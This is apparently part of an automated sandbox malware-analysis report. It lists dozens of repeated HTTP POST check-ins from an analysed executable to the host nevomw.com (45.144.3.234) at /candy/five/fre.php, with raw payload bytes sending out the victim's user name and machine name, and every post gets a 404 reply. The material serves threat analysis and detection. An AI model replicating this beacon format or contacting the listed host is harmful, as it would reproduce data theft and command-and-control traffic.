                                            218 | 192.168.2.6 | 49968 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:22.819144964 CET | 1656 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:22.871330023 CET | 1656 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:22.944391966 CET | 1656 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            219 | 192.168.2.6 | 49969 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:23.191459894 CET | 1657 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:23.244364023 CET | 1658 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:23.319731951 CET | 1658 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            22 | 192.168.2.6 | 49735 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:52.491063118 CET | 108 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:52.544442892 CET | 108 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:52.618566990 CET | 120 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            220 | 192.168.2.6 | 49970 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:23.600042105 CET | 1659 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:23.653995037 CET | 1659 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:23.739670992 CET | 1659 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            221 | 192.168.2.6 | 49971 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:24.003742933 CET | 1660 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:24.056588888 CET | 1660 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:24.134993076 CET | 1661 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            222 | 192.168.2.6 | 49972 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:24.413582087 CET | 1662 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:24.465447903 CET | 1662 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:24.556477070 CET | 1662 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            223 | 192.168.2.6 | 49973 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:24.870784044 CET | 1663 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:24.924897909 CET | 1663 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:25.002434015 CET | 1664 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            224 | 192.168.2.6 | 49974 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:25.288194895 CET | 1665 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:25.340574980 CET | 1665 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:25.414858103 CET | 1665 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            225 | 192.168.2.6 | 49975 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:25.721544027 CET | 1666 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:25.773643017 CET | 1666 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:25.849072933 CET | 1667 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            226 | 192.168.2.6 | 49976 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:26.144787073 CET | 1668 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:26.197416067 CET | 1668 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:26.272979021 CET | 1668 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            227 | 192.168.2.6 | 49977 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:26.570982933 CET | 1669 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:26.625888109 CET | 1669 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:26.711049080 CET | 1670 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            228 | 192.168.2.6 | 49978 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:27.002604008 CET | 1670 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:27.054647923 CET | 1671 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:27.132330894 CET | 1671 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            229 | 192.168.2.6 | 49979 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:27.439599991 CET | 1672 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:27.493242979 CET | 1672 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:27.568900108 CET | 1673 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            23 | 192.168.2.6 | 49737 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:52.880419970 CET | 145 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:52.938637018 CET | 145 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:53.017894030 CET | 147 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            230 | 192.168.2.6 | 49980 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:27.844926119 CET | 1673 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:27.897897005 CET | 1674 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:27.972228050 CET | 1674 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            231 | 192.168.2.6 | 49981 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:28.210752964 CET | 1675 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:28.263191938 CET | 1675 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:28.339982986 CET | 1675 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            232 | 192.168.2.6 | 49982 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:28.648578882 CET | 1676 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:28.707230091 CET | 1677 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:28.783734083 CET | 1677 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            233 | 192.168.2.6 | 49983 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:29.097569942 CET | 1678 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:29.151492119 CET | 1678 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:29.229926109 CET | 1679 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
